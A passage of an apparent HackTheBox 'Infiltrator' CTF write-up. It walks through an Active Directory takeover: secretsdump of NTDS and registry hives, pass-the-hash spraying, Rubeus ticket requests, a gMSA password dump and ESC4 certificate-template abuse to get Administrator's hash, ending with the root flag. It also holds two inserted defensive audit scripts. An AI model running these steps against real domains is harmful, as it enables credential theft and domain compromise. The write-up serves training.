C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\
...
Martinez Password

Creds:
O.martinez:M@rtinez_P@ssw0rd!
RDP
We can now finally RDP as Martinez.
The drive can be found via Explorer at E: and you need to use the recovery key; then we can find interesting files in Administrator's home.

Note: I exfiltrated the file via a simple PHP server https://gist.github.com/taterbase/2688850 (php -S 0.0.0.0:80 and mkdir uploads)
Exfiltrate the file and check the contents
└─$ 7z x Backup_Credentials.7z
└─$ lta
drwxr-xr-x - woyag 3 Sep 16:22 .
drwxr-xr-x - woyag 25 Feb 10:12 ├── 'Active Directory'
.rw-r--r-- 36M woyag 25 Feb 10:12 │ └── ntds.dit
.rw-r--r-- 2.1M woyag 3 Sep 16:22 ├── Backup_Credentials.7z
drwxr-xr-x - woyag 25 Feb 10:12 └── registry
.rw-r--r-- 262k woyag 25 Feb 10:00 ├── SECURITY
.rw-r--r-- 13M woyag 25 Feb 10:00 └── SYSTEM
Dump the passwords via secretsdump:
└─$ impacket-secretsdump -security ./registry/SECURITY -system ./registry/SYSTEM -ntds ./Active\ Directory/ntds.dit LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688
dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909
[*] NL$KM
0000 2E 8A EC D8 ED 12 C6 ED 26 8E B0 9B DF DA 42 B7 ........&.....B.
0010 49 DA B0 07 05 EE EA 07 05 02 04 0E AD F7 13 C2 I...............
0020 6C 6D 8E 19 1A B0 51 41 7C 7D 73 9E 99 BA CD B1 lm....QA|}s.....
0030 B7 7A 3E 0F 59 50 1C AD 8F 14 62 84 3F AC A9 92 .z>.YP....b.?...
NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299
[*] Reading and decrypting hashes from ./Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::
infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f:::
infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931:::
infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::
infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::
infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b:::
infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531:::
infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a:::
[*] Kerberos keys from ./Active Directory/ntds.dit
DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176
DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f
DC$:des-cbc-md5:5eea34b3317aea91
krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87
krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540
krbtgt:des-cbc-md5:10bfc49ecd3b58d9
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a
infiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9
infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052
infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0
infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ce
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120
infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfd
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4
infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153b
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b
infiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838ba
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c
infiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d
[*] Cleaning up...
The pass-the-hash method only works for Clark? (the foothold user)
└─$ netexec smb infiltrator.htb -u usernames -H hashes --no-bruteforce --continue-on-success
SMB 10.129.44.52 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\Administrator:7bf62b9c45112ffdadb7b6b4b9299dd2 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\DC$:fe4767309896203c581b9fc3c5e23b00 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\krbtgt:454fcbc37690c6e4628ab649e8e285a5 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\winrm_svc:84287cd16341b91eb93a58456b73e30f STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\lan_managment:e8ade553d9b0cb1769f429d897c92931 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\M.harris:fc236589c448c620417b15597a3d3ca7 STATUS_ACCOUNT_RESTRICTION
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\D.anderson:627a2cb0adc7ba12ea11174941b3da88 STATUS_ACCOUNT_RESTRICTION
SMB 10.129.44.52 445 DC01 [+] infiltrator.htb\L.clark:627a2cb0adc7ba12ea11174941b3da88
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\O.martinez:eb86d7bcb30c8eac1bdcae5061e2dff4 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\A.walker:46389d8dfdfcf0cbe262a71f576e574b STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\K.turner:48bcd1cdc870c6285376a990c2604531 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\E.rodriguez:b1918c2ce6a62f4eee11c51b6e2e965a STATUS_LOGON_FAILURE
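Reading a dump like the one above from the defender's side, as an added Python audit that is not part of the writeup: it parses secretsdump's NTDS credential lines and reports accounts with an empty password, accounts that still store an LM hash, and accounts sharing an NT hash (D.anderson and L.clark above carry the same value, i.e. the same password). The sample is constructed in secretsdump's format with placeholder hashes.

```python
import re
from collections import defaultdict

# Well-known constants: LM hash of an empty LM field and NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump NTDS line: [domain\]user:rid:lmhash:nthash:::  (Kerberos-key and status lines do not match)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample in secretsdump's output format (placeholder hashes, not the page's values;
# Guest carries the real empty-password NT hash so the check has something to find).
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000004:::
example.htb\alice:1105:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
example.htb\bob:1106:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
example.htb\carol:1107:0123456789abcdef0123456789abcdef:00000000000000000000000000000003:::
[*] Kerberos keys from ./Active Directory/ntds.dit
example.htb\alice:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000005
[*] Cleaning up...
"""


def parse_dump(text):
    """Return one dict per NTDS credential line; every other line of the dump is ignored."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append({"domain": m["domain"], "user": m["user"], "rid": int(m["rid"]),
                         "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return rows


def audit(rows):
    """Three things to check first in such a dump."""
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["user"])
    return {
        # accounts whose NT hash is that of the empty string (no password at all)
        "empty_password": sorted(r["user"] for r in rows if r["nt"] == EMPTY_NT),
        # accounts that still store an LM hash (legacy format, trivially crackable)
        "lm_hash_stored": sorted(r["user"] for r in rows if r["lm"] != EMPTY_LM),
        # groups of accounts with identical NT hashes, i.e. the same password
        "shared_password": sorted(sorted(users) for users in by_nt.values() if len(users) > 1),
    }


if __name__ == "__main__":
    for finding, accounts in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {accounts}")
```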
Rubeus only gives tickets for Clark and Anderson...
.\rb.exe asktgt /domain:infiltrator.htb /user:"DC$" /aes256:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"DC$" /aes128:d2a3d7c9ee6965b1e3cd710ed1ceed0f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"krbtgt" /aes256:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"krbtgt" /aes128:7874dff8138091d6c344381c9c758540 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"winrm_svc" /aes256:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"winrm_svc" /aes128:0faf5e0205d6f43ae37020f79f60606a /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"lan_managment" /aes256:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"lan_managment" /aes128:48f45b8eb2cbd8dbf578241ee369ddd9 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"M.harris" /aes256:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"M.harris" /aes128:2ee0cd05c3fa205a92e6837ff212b7a0 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"D.anderson" /aes256:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"D.anderson" /aes128:021e189e743a78a991616821138e2e69 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"L.clark" /aes256:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"L.clark" /aes128:5041c75e19de802e0f7614f57edc8983 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"O.martinez" /aes256:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"O.martinez" /aes128:33fdf738e13878a8101e3bf929a5a120 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"A.walker" /aes256:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"A.walker" /aes128:768672b783131ed963b9deeac0a6d2e4 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"K.turner" /aes256:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"K.turner" /aes128:b20f41c0d3b8fb6e1b793af4a835109b /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"E.rodriguez" /aes256:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"E.rodriguez" /aes128:ddd37cf706781414885f561c3b469d0c /ptt
NTDS database can be parsed into SQLite version: https://www.thehacker.recipes/ad/movement/credentials/dumping/ntds#ntds-directory-parsing-and-extraction
└─$ ntdsdotsqlite ./Active\ Directory/ntds.dit --system ./registry/SYSTEM -o ntds.sqlite
In the user_accounts table we find lan_managment, whose description contains the password!

lan_managment
Creds:
lan_managment:l@n_M@an!1331
WinRM doesn't work, but SMB confirms the password is valid.
└─$ evil-winrm -i dc01.infiltrator.htb -u lan_managment -p 'l@n_M@an!1331'
Error: Exiting with code 1
└─$ netexec smb infiltrator.htb -u 'lan_managment' -p 'l@n_M@an!1331'
SMB 10.129.230.229 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.230.229 445 DC01 [+] infiltrator.htb\lan_managment:l@n_M@an!1331
Enumerate AD again with bloodhound:
└─$ bloodhound-python -u 'lan_managment@infiltrator.htb' -p 'l@n_M@an!1331' -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op lan
Note: you might need to add the victim server as a nameserver in /etc/resolv.conf.

Dump the gMSA password with netexec (https://www.netexec.wiki/ldap-protocol/dump-gmsa):
└─$ netexec ldap infiltrator.htb -u 'lan_managment' -p 'l@n_M@an!1331' --gmsa
SMB 10.129.230.229 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.230.229 636 DC01 [+] infiltrator.htb\lan_managment:l@n_M@an!1331
LDAPS 10.129.230.229 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.230.229 636 DC01 Account: infiltrator_svc$ NTLM: 52dfec373c144cb8d50334cb73934612
infiltrator_svc$
Creds:
infiltrator_svc$:52dfec373c144cb8d50334cb73934612
Nothing new from this loot:
└─$ bloodhound-python -u 'infiltrator_svc$@infiltrator.htb' --hashes ':52dfec373c144cb8d50334cb73934612' -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op infiltrator_svc
ESC4
└─$ certipy-ad find -username 'infiltrator_svc$@infiltrator.htb' -vulnerable -hashes ':52dfec373c144cb8d50334cb73934612'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Saved BloodHound data to '20240904054156_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20240904054156_Certipy.txt'
[*] Saved JSON output to '20240904054156_Certipy.json'
└─$ cat 20240904054156_Certipy.txt
Certificate Authorities
0
CA Name : infiltrator-DC01-CA
DNS Name : dc01.infiltrator.htb
Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149
Certificate Validity Start : 2023-12-08 01:42:38+00:00
Certificate Validity End : 2124-08-04 18:55:57+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : INFILTRATOR.HTB\Administrators
Access Rights
ManageCertificates : INFILTRATOR.HTB\Administrators
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
ManageCa : INFILTRATOR.HTB\Administrators
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
Enroll : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
0
Template Name : Infiltrator_Template
Display Name : Infiltrator_Template
Certificate Authorities : infiltrator-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
PendAllRequests
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Smart Card Logon
Server Authentication
KDC Authentication
Client Authentication
Requires Manager Approval : True
Requires Key Archival : False
Authorized Signatures Required : 1
Validity Period : 99 years
Renewal Period : 650430 hours
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : INFILTRATOR.HTB\Local System
Full Control Principals : INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Owner Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Dacl Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
[!] Vulnerabilities
ESC4 : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions
https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4
https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-templates-esc4
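From the defender's side, the finding above is visible in the Certipy text report itself: a non-admin principal (infiltrator_svc) holds Write Owner and Write Dacl on a template. The following is an added example, not part of this writeup or of Certipy, that parses the "Certificate Templates" section of such a report and flags every control right held by a principal outside the built-in admin groups; the embedded report is a constructed, trimmed copy of the output shown above.

```python
# Principals expected to control templates; anything else holding a control right is flagged.
PRIVILEGED = {"Administrators", "Domain Admins", "Enterprise Admins", "Local System"}
CONTROL_RIGHTS = ("Full Control Principals", "Write Owner Principals",
                  "Write Dacl Principals", "Write Property Principals")
HEADERS = {"Permissions", "Object Control Permissions", "Enrollment Permissions"}

# Constructed sample in Certipy's text-report layout (trimmed from the output shown above).
SAMPLE_REPORT = """\
Certificate Templates
  0
    Template Name                : Infiltrator_Template
    Enrollment Flag              : PublishToDs
                                   PendAllRequests
    Permissions
      Object Control Permissions
        Owner                    : INFILTRATOR.HTB\\Local System
        Full Control Principals  : INFILTRATOR.HTB\\Domain Admins
                                   INFILTRATOR.HTB\\Enterprise Admins
        Write Owner Principals   : INFILTRATOR.HTB\\infiltrator_svc
                                   INFILTRATOR.HTB\\Domain Admins
        Write Dacl Principals    : INFILTRATOR.HTB\\infiltrator_svc
                                   INFILTRATOR.HTB\\Domain Admins
"""

def parse_templates(report):
    """Turn the 'Certificate Templates' part of a Certipy text report into dicts of key -> [values]."""
    templates, current, key, in_templates = [], None, None, False
    for line in (l.strip() for l in report.splitlines() if l.strip()):
        if line == "Certificate Templates":
            in_templates = True
        elif not in_templates or line in HEADERS or line.startswith("[!]"):
            key = None                        # section header or CA section: no field is open
        elif line.isdigit():                  # numbered entry starts a new template
            current, key = {}, None
            templates.append(current)
        elif current is None:
            continue                          # keyed lines before the first numbered entry
        elif " : " in line:
            key, value = (p.strip() for p in line.split(" : ", 1))
            current[key] = [value]
        elif key is not None:                 # unlabelled line continues a multi-valued field
            current[key].append(line)
    return templates

def esc4_findings(templates):
    """List (template, right, principal) for control rights held by non-privileged principals."""
    findings = []
    for tpl in templates:
        name = tpl.get("Template Name", ["<unnamed>"])[0]
        for right in CONTROL_RIGHTS:
            for principal in tpl.get(right, []):
                if principal.split("\\", 1)[-1] not in PRIVILEGED:   # strip the DOMAIN\ prefix
                    findings.append((name, right, principal))
    return findings
```

Run against the full `*_Certipy.txt` report to audit every template at once; any finding is a template whose ACL should be reviewed and tightened.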
└─$ certipy-ad template -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -template Infiltrator_Template -save-old
└─$ certipy-ad template -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -template Infiltrator_Template
└─$ certipy-ad req -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -ca infiltrator-DC01-CA -target dc01.infiltrator.htb -template Infiltrator_Template -upn administrator@infiltrator.htb -timeout 1000
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 129
[*] Got certificate with UPN 'administrator@infiltrator.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
└─$ certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain infiltrator.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1
Note: certipy-ad req took forever to work, probably because the template change didn't apply properly, or it's just the box. Make sure to run template and then req a few times!!!
Administrator
└─$ evil-winrm -i dc01.infiltrator.htb -u Administrator -H '1356f502d2764368302ff0369b1121a1'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
Folder PATH listing
Volume serial number is 96C7-B603
C:.
+---Desktop
| | backup.zip
| | root.txt
| |
| \---Infiltrator ADCS Backups
| | infiltrator-DC01-CA.p12
| |
| \---DataBase
| certbkxp.dat
| edb00002.log
| infiltrator-DC01-CA.edb
+---Links
| ADCSTemplate.psm1
| Autologon64.exe
| cleaning_up.ps1
| cleanup_ca.ps1
| Desktop.lnk
| Downloads.lnk
| Infiltrator_Template.json
| ldap.ps1
| Lock-BitLocker.ps1
| messenger.ps1
| start_end_rdp.ps1
|
Root.txt
*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/root.txt
f40be542524863588bc1b33049aa4488